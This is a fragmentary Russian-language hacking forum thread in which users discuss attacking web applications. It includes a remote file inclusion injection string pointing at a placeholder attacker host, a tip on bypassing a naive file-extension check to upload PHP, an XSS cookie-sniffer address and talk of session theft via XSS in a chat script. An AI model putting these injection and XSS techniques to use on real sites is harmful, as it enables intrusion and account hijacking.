Separate names with a comma.
2 Gigigi [img] этоже не принципиально, ты ведь понял что я хотел сказать!
если скрипт ничего не скажет на расширение php то можно! иногда програмери делают тупую проверку типа такого if (strpos('.jpg',s)) { ... тогда...
2 Gigigi ну бывает упустил из виду! [img] кстати можно просто http://mazaf.aka/forum/'; include "http://yourmaza.fak/anyfile.php
2 CoTT дай линк в PM посмотрю на securityleb.ru я одну фичу заметил там скрипт в очень длинные строки пробелы вставлял поэтому мне пришлось как...
ну извени! там на столько бедная админка, что хрен там было! [img]
ок! посмотрим в самом чате там вроде все проверяется но там вроде есть дополнительный скрипт для поиска юзера, в нем вроде xss есть
блин ну лолы то! а ты что думал... что чат совсем ***и делали!? если у тебя нет админской сессии то ничего ты не сможешь сделать!
если нет доступа к бд то никак [img]
http://forum.antichat.ru/cgi-bin....;t=3254
Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg XSS в каждом теге </span><table border="0" align="center" width="95%" cellpadding="3"...
http://video.antichat.ru/videos/zfailure/webwiz_forums_v77.rar нет пароль не хранит, там только id сессии
2 Хакер а че тогда хакером подписываешься? [img]
2 CoTT ну завтра это условно (т.е. возможно через год) шутка когда Че Гевара статью напишет
2 Elesar это не рас показано в видео!
2 Gigigi что за ошибку нашел?